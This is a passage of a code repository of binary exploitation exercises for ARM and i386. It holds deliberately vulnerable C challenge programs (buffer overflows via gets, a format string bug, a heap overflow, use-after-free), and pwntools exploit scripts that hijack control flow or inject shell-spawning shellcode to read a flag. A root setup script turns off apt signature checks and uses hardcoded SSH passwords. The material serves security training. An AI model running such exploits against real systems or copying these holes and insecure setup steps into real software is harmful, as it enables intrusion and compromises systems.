uid = geteuid(); 22 | strcpy(command_string, "cat flag\x00"); 23 | if (admin == 1){ 24 | setresuid(uid,uid,uid); 25 | system(command_string); 26 | } 27 | printf("You are not admin!\n"); 28 | } 29 | 30 | void send(){ 31 | char name[BUF_SIZE] = {0}; 32 | char content[BUF_SIZE] = {0}; 33 | 34 | printf("Creating message\n"); 35 | printf("Enter message name:"); 36 | fgets(name, BUF_SIZE, stdin); 37 | printf("Enter message content:"); 38 | gets(content); 39 | 40 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 41 | } 42 | 43 | int menu(){ 44 | char buffer[BUF_SIZE] = {0}; 45 | 46 | printf("[*] menu\n"); 47 | printf("menu - show this menu\n"); 48 | printf("send - send new message\n"); 49 | printf("exit - close program\n"); 50 | 51 | fgets(buffer, BUF_SIZE, stdin); 52 | 53 | if (strcmp(buffer, "menu\n") == 0){ 54 | return 1; 55 | } 56 | else if (strcmp(buffer, "send\n") == 0){ 57 | send(); 58 | return 1; 59 | } 60 | else if (strcmp(buffer, "admin\n") == 0){ 61 | authenticate(); 62 | return 1; 63 | } 64 | else if (strcmp(buffer, "exit\n") == 0){ 65 | return 0; 66 | } 67 | else{ 68 | printf("Unknown command: %s", buffer); 69 | return 1; 70 | } 71 | 72 | } 73 | 74 | int main(int argc, char **argv){ 75 | setbuf(stdout, NULL); 76 | printf("Welcome to ch09!\n"); 77 | while(1){ 78 | if (!(menu())){ 79 | break; 80 | } 81 | printf("\n"); 82 | } 83 | printf("Exiting...\n"); 84 | } 85 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch09.c -static -fno-stack-protector -no-pie -o $1/ch09 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch09' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | e = ELF(challenge_name) 22 | functions = e.functions 23 | symbols = e.symbols 24 | write_anywhere_func_addr = functions['write_anywhere'].address + 4 25 | authenticate_func_addr = functions['authenticate'].address 26 | gadget_func_addr = functions['gadget'].address + 4 27 | admin_string_addr = symbols['admin'] 28 | 29 | r.recvuntil('exit - close program') 30 | send(r, msg_name='angel', 31 | msg_content=cyclic(108) + pack(gadget_func_addr, 32) + pack(0x1, word_size=32) + pack(admin_string_addr, 32 | word_size=32) + pack( 33 | write_anywhere_func_addr, word_size=32) + 'aaaa' + pack(authenticate_func_addr, 32)) 34 | 35 | r.recvuntil('zenysec') 36 | flag = 'zenysec' + r.recvuntil('\n') 37 | log.success('The flag is: {flag}'.format(flag=flag)) 38 | r.close() 39 | 40 | 41 | if __name__ == '__main__': 42 | parser = argparse.ArgumentParser(description='Exploit ch09') 43 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 44 | main(**vars(parser.parse_args())) 45 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch09/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/ch10: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch10/ch10 -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/ch10.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void send(){ 9 | char name[BUF_SIZE] = {0}; 10 | char content[BUF_SIZE] = {0}; 11 | 12 | printf("Creating message\n"); 13 | printf("Enter message name:"); 14 | fgets(name, BUF_SIZE, stdin); 15 | printf("Enter message content:"); 16 | gets(content); 17 | 18 | printf("name: \""); 19 | printf(name); 20 | printf("\"\ncontent:\"%s\"\n", content); 21 | } 22 | 23 | int menu(){ 24 | char buffer[BUF_SIZE] = {0}; 25 | 26 | printf("[*] menu\n"); 27 | printf("menu - show this menu\n"); 28 | printf("send - send new message\n"); 29 | printf("exit - close program\n"); 30 | 31 | fgets(buffer, BUF_SIZE, stdin); 32 | 33 | if (strcmp(buffer, "menu\n") == 0){ 34 | return 1; 35 | } 36 | else if (strcmp(buffer, "send\n") == 0){ 37 | send(); 38 | return 1; 39 | } 40 | else if (strcmp(buffer, "exit\n") == 0){ 41 | return 0; 42 | } 43 | else{ 44 | printf("Unknown command: %s", buffer); 45 | return 1; 46 | } 47 | 48 | } 49 | 50 | int main(int argc, char **argv){ 51 | setbuf(stdout, NULL); 52 | uid_t uid = geteuid(); 53 | setresuid(uid,uid,uid); 54 | printf("Welcome to ch10!\n"); 55 | while(1){ 56 | if (!(menu())){ 57 | break; 58 | } 59 | printf("\n"); 60 | } 61 | printf("Exiting...\n"); 62 | } 63 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch10.c -static -fno-stack-protector -z execstack -no-pie -o $1/ch10 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | context.clear(arch='arm') 8 | 9 | 10 | def send(r, msg_name, msg_content): 11 | r.sendline('send') 12 | r.recvuntil('Enter message name:') 13 | r.sendline(msg_name) 14 | r.recvuntil('Enter message content:') 15 | r.sendline(msg_content) 16 | 17 | 18 | def main(execution): 19 | challenge_name = 'ch10' 20 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 21 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 22 | 23 | shell_code = asm(shellcraft.arm.linux.sh()) 24 | 25 | r.recvuntil('exit - close program') 26 | send(r, msg_name='%3$x', msg_content="aaaa") 27 | 28 | r.recvuntil('name: \"') 29 | stack_ret = int(r.recvline().strip(), 16) + 0x38 30 | log.info('stack ret: {stack_ret}'.format(stack_ret=hex(stack_ret))) 31 | 32 | r.recvuntil('exit - close program') 33 | send(r, msg_name='angel', 34 | msg_content=cyclic(108) + pack(stack_ret+4, word_size=32) + shell_code) 35 | 36 | time.sleep(1) 37 | r.sendline('cat flag') 38 | r.recvuntil('zenysec') 39 | flag = 'zenysec' + r.recvuntil('\n') 40 | log.success('The flag is: {flag}'.format(flag=flag)) 41 | r.close() 42 | 43 | 44 | if __name__ == '__main__': 45 | parser = argparse.ArgumentParser(description='Exploit ch10') 46 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 47 | main(**vars(parser.parse_args())) 48 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch10/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch11/ch11: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch11/ch11 -------------------------------------------------------------------------------- /writeups/arm32v7/ch11/ch11.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | void secret(){ 20 | system("cat flag"); 21 | } 22 | 23 | void send(){ 24 | 25 | message* msg = (message*) malloc(sizeof(message)); 26 | important* object_01 = (important*) malloc(sizeof(important)); 27 | 28 | printf("Creating message\n"); 29 | printf("Enter message name:"); 30 | fgets(msg->name, BUF_SIZE, stdin); 31 | printf("Enter message content:"); 32 | gets(msg->content); 33 | 34 | if (object_01->func_ptr){ 35 | object_01->func_ptr(); 36 | } 37 | 38 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 39 | } 40 | 41 | int menu(){ 42 | char buffer[BUF_SIZE] = {0}; 43 | 44 | printf("[*] menu\n"); 45 | printf("menu - show this menu\n"); 46 | printf("send - send new message\n"); 47 | printf("exit - close program\n"); 48 | 49 | fgets(buffer, BUF_SIZE, stdin); 50 | 51 | if (strcmp(buffer, "menu\n") == 0){ 52 | return 1; 53 | } 54 | else if (strcmp(buffer, "send\n") == 0){ 55 | send(); 56 | return 1; 57 | } 58 | else if (strcmp(buffer, "exit\n") == 0){ 59 | return 0; 60 | } 61 | else{ 62 | printf("Unknown command: %s", buffer); 63 | return 1; 64 | } 65 | 66 | } 67 | 68 | int main(int argc, char **argv){ 69 | setbuf(stdout, NULL); 70 | uid_t uid = geteuid(); 71 | setresuid(uid,uid,uid); 72 | printf("Welcome to ch11!\n"); 73 | while(1){ 74 | if (!(menu())){ 75 | break; 76 | } 77 | printf("\n"); 78 | } 79 | printf("Exiting...\n"); 80 | } 81 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch11/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch11.c -static -no-pie -o $1/ch11 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch11/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | context.clear(arch='arm') 8 | 9 | 10 | def send(r, msg_name, msg_content): 11 | r.sendline('send') 12 | r.recvuntil('Enter message name:') 13 | r.sendline(msg_name) 14 | r.recvuntil('Enter message content:') 15 | r.sendline(msg_content) 16 | 17 | 18 | def main(execution): 19 | challenge_name = 'ch11' 20 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 21 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 22 | 23 | secret_func_addr = ELF(challenge_name).functions['secret'].address 24 | r.recvuntil('exit - close program') 25 | send(r, msg_name='angel', msg_content=cyclic(154) + pack(secret_func_addr, word_size=32)) 26 | 27 | r.recvuntil('zenysec') 28 | flag = 'zenysec' + r.recvuntil('\n') 29 | log.success('The flag is: {flag}'.format(flag=flag)) 30 | r.close() 31 | 32 | 33 | if __name__ == '__main__': 34 | parser = argparse.ArgumentParser(description='Exploit ch11') 35 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 36 | main(**vars(parser.parse_args())) 37 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch11/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch12/ch12: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/arm32v7/ch12/ch12 -------------------------------------------------------------------------------- /writeups/arm32v7/ch12/ch12.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | typedef struct{ 9 | char name[BUF_SIZE]; 10 | char content[BUF_SIZE]; 11 | } message; 12 | 13 | typedef struct{ 14 | char junk01[BUF_SIZE]; 15 | char junk02[BUF_SIZE]; 16 | void (*func_ptr)(); 17 | } important; 18 | 19 | important* work; 20 | 21 | void func(){ 22 | printf("[*] Working\n"); 23 | } 24 | 25 | void secret(){ 26 | system("cat flag"); 27 | } 28 | 29 | void create_worker(){ 30 | work = (important*) malloc(sizeof(important)); 31 | work->func_ptr = func; 32 | printf("Worker Created in %p\n", work); 33 | } 34 | 35 | void start_worker(){ 36 | work->func_ptr(); 37 | } 38 | 39 | void free_worker(){ 40 | free(work); 41 | } 42 | 43 | void send(){ 44 | message* msg = (message*) malloc(sizeof(message)); 45 | printf("Message Created in %p\n", msg); 46 | 47 | printf("Creating message\n"); 48 | printf("Enter message name:"); 49 | fgets(msg->name, BUF_SIZE, stdin); 50 | printf("Enter message content:"); 51 | gets(msg->content); 52 | printf("name: \"%s\"\ncontent:\"%s\"\n", msg->name, msg->content); 53 | } 54 | 55 | int menu(){ 56 | char buffer[BUF_SIZE] = {0}; 57 | 58 | printf("[*] menu\n"); 59 | printf("menu - show this menu\n"); 60 | printf("send - send new message\n"); 61 | printf("create_worker - create worker\n"); 62 | printf("start_worker - run worker\n"); 63 | printf("free_worker - free current worker\n"); 64 | printf("exit - close program\n"); 65 | 66 | fgets(buffer, BUF_SIZE, stdin); 67 | 68 | if (strcmp(buffer, "menu\n") == 0){ 69 | return 1; 70 | } 71 | else if (strcmp(buffer, "create_worker\n") == 0){ 72 | create_worker(); 73 | return 1; 74 | } 75 | else if (strcmp(buffer, "start_worker\n") == 0){ 76 | start_worker(); 77 | return 1; 78 | } 79 | else if (strcmp(buffer, "free_worker\n") == 0){ 80 | free_worker(); 81 | return 1; 82 | } 83 | else if (strcmp(buffer, "send\n") == 0){ 84 | send(); 85 | return 1; 86 | } 87 | else if (strcmp(buffer, "exit\n") == 0){ 88 | return 0; 89 | } 90 | else{ 91 | printf("Unknown command: %s", buffer); 92 | return 1; 93 | } 94 | 95 | } 96 | 97 | int main(int argc, char **argv){ 98 | setbuf(stdout, NULL); 99 | uid_t uid = geteuid(); 100 | setresuid(uid,uid,uid); 101 | printf("Welcome to ch12!\n"); 102 | while(1){ 103 | if (!(menu())){ 104 | break; 105 | } 106 | printf("\n"); 107 | } 108 | printf("Exiting...\n"); 109 | } 110 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch12/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch12.c -static -no-pie -o $1/ch12 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch12/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from ArmExploit import ArmExploit 5 | import argparse 6 | 7 | context.clear(arch='arm') 8 | 9 | 10 | def free_worker(r): 11 | r.sendline('free_worker') 12 | 13 | 14 | def start_worker(r): 15 | r.sendline('start_worker') 16 | 17 | 18 | def create_worker(r): 19 | r.sendline('create_worker') 20 | 21 | 22 | def send(r, msg_name, msg_content): 23 | r.sendline('send') 24 | r.recvuntil('Enter message name:') 25 | r.sendline(msg_name) 26 | r.recvuntil('Enter message content:') 27 | r.sendline(msg_content) 28 | 29 | 30 | def main(execution): 31 | challenge_name = 'ch12' 32 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 33 | r = ArmExploit(challenge_name=challenge_name, execution=execution).r 34 | 35 | secret_func_addr = ELF(challenge_name).functions['secret'].address 36 | r.recvuntil('exit - close program') 37 | 38 | create_worker(r) 39 | free_worker(r) 40 | send(r, msg_name='angel', msg_content=cyclic(50) + pack(secret_func_addr, word_size=32)) 41 | start_worker(r) 42 | 43 | r.recvuntil('zenysec') 44 | flag = 'zenysec' + r.recvuntil('\n') 45 | log.success('The flag is: {flag}'.format(flag=flag)) 46 | r.close() 47 | 48 | 49 | if __name__ == '__main__': 50 | parser = argparse.ArgumentParser(description='Exploit ch12') 51 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 52 | main(**vars(parser.parse_args())) 53 | -------------------------------------------------------------------------------- /writeups/arm32v7/ch12/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/arm32v7/debug.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | function welcome(){ 4 | echo "** ZenySec Exercises **" 5 | 6 | if [ -z $1 ] || [ -z $2 ] ; then 7 | echo "usage: ./debug.sh arm-executable port" 8 | exit 1 9 | fi 10 | } 11 | 12 | function run_gdb_server(){ 13 | echo "[*] Killing running gdb-server..." 14 | kill -9 `ps -A | grep qemu-arm-static | cut -d' ' -f1` 15 | 16 | echo "[*] Executing gdb-server for $1 on port $2..." 17 | #x-terminal-emulator -e "qemu-arm-static -g $2 $1" 18 | gnome-terminal -e "qemu-arm-static -g $2 $1" 19 | } 20 | 21 | function run_gdb_attach(){ 22 | echo "[*] Executing gdb-multiarch for $1 on port $2..." 23 | echo "[*] Use xhelp in gdb for help..." 24 | sed -i "s/localhost:[0-9]*/localhost:$2/g" gdb_plugin.sh 25 | gdb-multiarch $1 -x gdb_plugin.sh 26 | } 27 | 28 | 29 | function main(){ 30 | welcome $1 $2 31 | run_gdb_server $1 $2 32 | run_gdb_attach $1 $2 33 | } 34 | 35 | main $1 $2 36 | echo "[*] Done!" 37 | -------------------------------------------------------------------------------- /writeups/arm32v7/gdb_plugin.sh: -------------------------------------------------------------------------------- 1 | define xhelp 2 | printf "---------------\n" 3 | printf "\txt - target remote localhost:20000\n" 4 | printf "---------------\n" 5 | printf "\txarch - set architecture arm\n" 6 | printf "---------------\n" 7 | end 8 | 9 | define xarch 10 | set architecture arm 11 | end 12 | 13 | define xt 14 | target remote localhost:20000 15 | end 16 | 17 | -------------------------------------------------------------------------------- /writeups/arm32v7/remote.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | function welcome(){ 4 | echo "** ZenySec Exercises **" 5 | 6 | if [ -z "$1" ]; then 7 | echo "usage: ./remote.sh project_path (writeups/arm32v7)" 8 | exit 1 9 | fi 10 | 11 | export PYTHONPATH=$1:$PYTHONPATH 12 | } 13 | 14 | function remote(){ 15 | echo "[*] Testing exploits remote..." 16 | for i in `ls | grep ch`; do 17 | cd $1/$i 18 | python exploit.py -e remote 19 | cd .. 20 | done 21 | } 22 | 23 | function main(){ 24 | welcome $1 25 | remote $1 26 | } 27 | 28 | main $1 29 | echo "[*] Done!" 30 | -------------------------------------------------------------------------------- /writeups/arm32v7/run.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | function welcome(){ 4 | echo "** ZenySec Exercises **" 5 | 6 | if [ -z "$1" ]; then 7 | echo "usage: ./run.sh arm-executable" 8 | exit 1 9 | fi 10 | } 11 | 12 | function run_exe(){ 13 | echo "[*] Executing $1..." 14 | qemu-arm-static $1 15 | } 16 | 17 | function main(){ 18 | welcome $1 19 | run_exe $1 20 | } 21 | 22 | main $1 23 | echo "[*] Done!" 24 | -------------------------------------------------------------------------------- /writeups/arm32v7/setup.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | function welcome(){ 4 | echo "** ZenySec Exercises **" 5 | 6 | if [[ $EUID -ne 0 ]]; then 7 | echo "This script must be run as root" 8 | exit 1 9 | fi 10 | 11 | if [ -z "$1" ]; then 12 | echo "usage: ./setup.sh user_name" 13 | exit 1 14 | fi 15 | } 16 | 17 | function download_arm_binutils(){ 18 | echo "[*] Downloading arm-binutils..." 19 | if ! grep -q pwntools /etc/apt/sources.list ; then 20 | echo "deb http://ppa.launchpad.net/pwntools/binutils/ubuntu trusty bionic main" >> /etc/apt/sources.list 21 | fi 22 | apt -o Acquire::AllowInsecureRepositories=true -o Acquire::AllowDowngradeToInsecureRepositories=true update 23 | apt-get install binutils-arm-linux-gnu 24 | } 25 | 26 | function download_gdb_multi_arch(){ 27 | echo "[*] Downloading gdb-multiarch..." 28 | apt-get install -y gdb-multiarch 29 | } 30 | 31 | function download_qemu(){ 32 | echo "[*] Downloading QEMU..." 33 | apt-get install -y qemu 34 | apt-get install -y qemu-user-static 35 | } 36 | 37 | function download_kpartx(){ 38 | echo "[*] Downloading kpatx..." 39 | apt-get install -y kpartx 40 | } 41 | 42 | function download_kpartx(){ 43 | echo "[*] Downloading sshpass..." 44 | apt-get install -y sshpass 45 | } 46 | 47 | function download_tools(){ 48 | echo "[*] Downloading tools..." 49 | sshpass -p 'welcome' scp -P20000 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no welcome@exercises-arm32v7.zenysec.com:/home/welcome/\{debug.sh,gdb_plugin.sh,run.sh,remote.sh\} . 50 | } 51 | 52 | function download_challenges(){ 53 | echo "[*] Downloading challenges..." 54 | 55 | for i in ch00 ch01 ch02 ch03 ch04 ch05 ch06 ch07 ch08 ch09 ch10 ch11 ch12; do 56 | mkdir -p $i 57 | sshpass -p $i scp -P20000 -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no $i@exercises-arm32v7.zenysec.com:/home/$i/\{$i.c,$i,compile.sh\} $i/ 58 | done 59 | } 60 | 61 | function download(){ 62 | apt-get update 63 | 64 | download_qemu 65 | download_kpartx 66 | download_gdb_multi_arch 67 | download_tools 68 | download_challenges 69 | download_arm_binutils 70 | 71 | } 72 | 73 | function change_permissions(){ 74 | chgrp -R $1 ch*/ 75 | chown -R $1 ch*/ 76 | chmod 777 ch*/* 77 | 78 | chgrp -R $1 *.sh 79 | chown -R $1 *.sh 80 | chmod +x *.sh 81 | } 82 | 83 | function main(){ 84 | welcome $1 85 | download $1 86 | change_permissions $1 87 | } 88 | 89 | main $1 90 | echo "[*] Done!" 91 | -------------------------------------------------------------------------------- /writeups/i386/I386Exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | 5 | 6 | class I386Exploit(object): 7 | def __init__(self, challenge_name, execution, remote_port=20000): 8 | self.r = None 9 | if execution == 'debug': 10 | r = process( 11 | ['./{challenge_name}'.format(challenge_name=challenge_name)]) 12 | gdb.attach(r, gdbscript=open('../gdb_plugin.sh')) 13 | log.info('xhelp - help in gdb') 14 | elif execution == 'local': 15 | r = process(['./{challenge_name}'.format(challenge_name=challenge_name)]) 16 | elif execution == 'remote': 17 | ssh_client = ssh(user=challenge_name, host='exercises-i386.zenysec.com', port=remote_port, 18 | password=challenge_name) 19 | r = ssh_client.process(['./{challenge_name}'.format(challenge_name=challenge_name)]) 20 | else: 21 | log.error('Unknown execution type {execution}'.format(execution=execution)) 22 | raise Exception('I386Exploit: Unknown execution type {execution}'.format(execution=execution)) 23 | self.r = r 24 | -------------------------------------------------------------------------------- /writeups/i386/I386Exploit.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/I386Exploit.pyc -------------------------------------------------------------------------------- /writeups/i386/ch00/ch00: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch00/ch00 -------------------------------------------------------------------------------- /writeups/i386/ch00/ch00.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char value; 17 | }; 18 | struct locals l = {.value = 0, .content = {0}, .name = {0}}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | if(l.value == 0x7){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | printf("Welcome to ch00!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /writeups/i386/ch00/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch00.c -static -no-pie -o $1/ch00 2 | -------------------------------------------------------------------------------- /writeups/i386/ch00/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch00' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | r.recvuntil('exit - close program') 22 | send(r, msg_name='angel', msg_content=cyclic(50) + pack(0x7, word_size=32)) 23 | r.recvuntil('zenysec') 24 | flag = 'zenysec' + r.recvuntil('\n') 25 | log.success('The flag is: {flag}'.format(flag=flag)) 26 | r.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | parser = argparse.ArgumentParser(description='Exploit ch00') 31 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 32 | main(**vars(parser.parse_args())) 33 | -------------------------------------------------------------------------------- /writeups/i386/ch00/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch01/ch01: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch01/ch01 -------------------------------------------------------------------------------- /writeups/i386/ch01/ch01.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | char admin[BUF_SIZE]; 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .admin = "false"}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | if(!(strcmp(l.admin, "true"))){ 28 | secret(); 29 | } 30 | } 31 | 32 | int menu(){ 33 | char buffer[BUF_SIZE] = {0}; 34 | 35 | printf("[*] menu\n"); 36 | printf("menu - show this menu\n"); 37 | printf("send - send new message\n"); 38 | printf("exit - close program\n"); 39 | 40 | fgets(buffer, BUF_SIZE, stdin); 41 | 42 | if (strcmp(buffer, "menu\n") == 0){ 43 | return 1; 44 | } 45 | else if (strcmp(buffer, "send\n") == 0){ 46 | send(); 47 | return 1; 48 | } 49 | else if (strcmp(buffer, "exit\n") == 0){ 50 | return 0; 51 | } 52 | else{ 53 | printf("Unknown command: %s", buffer); 54 | return 1; 55 | } 56 | 57 | } 58 | 59 | int main(int argc, char **argv){ 60 | setbuf(stdout, NULL); 61 | uid_t uid = geteuid(); 62 | setresuid(uid,uid,uid); 63 | printf("Welcome to ch01!\n"); 64 | while(1){ 65 | if (!(menu())){ 66 | break; 67 | } 68 | printf("\n"); 69 | } 70 | printf("Exiting...\n"); 71 | } 72 | -------------------------------------------------------------------------------- /writeups/i386/ch01/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch01.c -static -no-pie -o $1/ch01 2 | -------------------------------------------------------------------------------- /writeups/i386/ch01/exploit.py: -------------------------------------------------------------------------------- 1 | __author__ = '@tomereyz' 2 | 3 | from pwn import * 4 | from I386Exploit import I386Exploit 5 | import argparse 6 | 7 | 8 | def send(r, msg_name, msg_content): 9 | r.sendline('send') 10 | r.recvuntil('Enter message name:') 11 | r.sendline(msg_name) 12 | r.recvuntil('Enter message content:') 13 | r.sendline(msg_content) 14 | 15 | 16 | def main(execution): 17 | challenge_name = 'ch01' 18 | log.info('Exploiting {challenge_name}!'.format(challenge_name=challenge_name)) 19 | r = I386Exploit(challenge_name=challenge_name, execution=execution).r 20 | 21 | r.recvuntil('exit - close program') 22 | send(r, msg_name='angel', msg_content=cyclic(50) + 'true') 23 | r.recvuntil('zenysec') 24 | flag = 'zenysec' + r.recvuntil('\n') 25 | log.success('The flag is: {flag}'.format(flag=flag)) 26 | r.close() 27 | 28 | 29 | if __name__ == '__main__': 30 | parser = argparse.ArgumentParser(description='Exploit ch01') 31 | parser.add_argument('-e', '--execution', help='execution type', required=True, dest='execution') 32 | main(**vars(parser.parse_args())) 33 | -------------------------------------------------------------------------------- /writeups/i386/ch01/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /writeups/i386/ch02/ch02: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/eLoopWoo/zenysec-exploit-exercises/4fdf1da2b60a1d11e727eb217b23df477fe108ea/writeups/i386/ch02/ch02 -------------------------------------------------------------------------------- /writeups/i386/ch02/ch02.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | 